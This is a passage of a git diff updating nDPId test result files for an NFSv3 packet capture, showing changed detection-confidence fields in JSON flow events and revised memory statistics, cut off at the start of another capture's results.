-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397330,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397330,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":944207397330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207397330,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA05D0AAP8RlOCLGRZmixkWAggBDOIAIOXSOEOKGQAAAAEAAAAAAAAAAAAAAAAAAAAA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397400,"flow_last_seen":944207397400,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":944207397400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":944207397400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":944207397400,"pkt":"AMCV+E3TAMCV4Bm+CABFAACcZUEAAP8RE3WLGRYCixkWZgP+CAEAiHeHXh0L3AAAAAAAAAACAAGGowAAAAMAAAABAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAgABAQhQAAA+cACgAAAACyWgAAACkACgAAAACyWgAAACk="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397400,"flow_last_seen":944207397400,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":944207397400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397400,"flow_last_seen":944207397400,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":944207397400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":944207397400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":944207397400,"pkt":"AMCV4Bm+AMCV+E3TCABFAACM5FMAAP8RlHKLGRZmixkWAggBA\/4AeFlmXh0L3AAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAEHtAAAAAgAAAAAAAAABAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEIUAAAAAAACyWjhHdgwUQ\/0COEd16jDgNQI4R3XqMOA1Ag=="} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":944207397400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":944207397400,"pkt":"AMCV+E3TAMCV4Bm+CABFAACcZUIAAP8RE3SLGRYCixkWZgP+CAEAiHd0Xh0L3QAAAAAAAAACAAGGowAAAAMAAAATAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAgABAQhQAAA+cACgAAAACyWgAAACkACgAAAACyWgAAACk="} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397740,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":944207397740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207397740,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZXwAAEAR0nqLGRYCixkWZgzjAG8ASDjzOExLeQAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAABAAAAA3VkcAAAAAAAAAAAAA=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397740,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397740,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":944207397740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207397740,"pkt":"AMCV4Bm+AMCV+E3TCABFAABM5PUAAEARUxGLGRZmixkWAgBvDOMAOGUBOExLeQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":944207397750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207397750,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZX4AAEAR0kSLGRYCixkWZgLSBBgAfLyvOExziQAAAAAAAAACAAGGpQAAAAEAAAADAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":944207397750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207397750,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA05PgAAEARUyaLGRZmixkWAgQYAtIAIApTOExziQAAAAEAAAAAAAAAAAAAAAAAAAAA"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
-00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397310,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
-00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":944207397400,"flow_last_seen":944207397690,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":16648,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397310,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":944207397400,"flow_last_seen":944207397690,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":16648,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","packets-captured":128,"packets-processed":128,"total-skipped-flows":0,"total-l4-payload-len":17440,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":944207397750} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 128/128 @@ -50,9 +50,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880575 bytes -~~ total memory freed........: 5880575 bytes -~~ total allocations/frees...: 118270/118270 +~~ total memory allocated....: 6014209 bytes +~~ total memory freed........: 6014209 bytes +~~ total allocations/frees...: 121032/121032 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 814 chars diff --git a/test/results/nintendo.pcap.out b/test/results/nintendo.pcap.out index c3051f5e6..faea05063 100644 --- a/test/results/nintendo.pcap.out +++ b/test/results/nintendo.pcap.out 
@@ -2,14 +2,14 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1500731320644} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 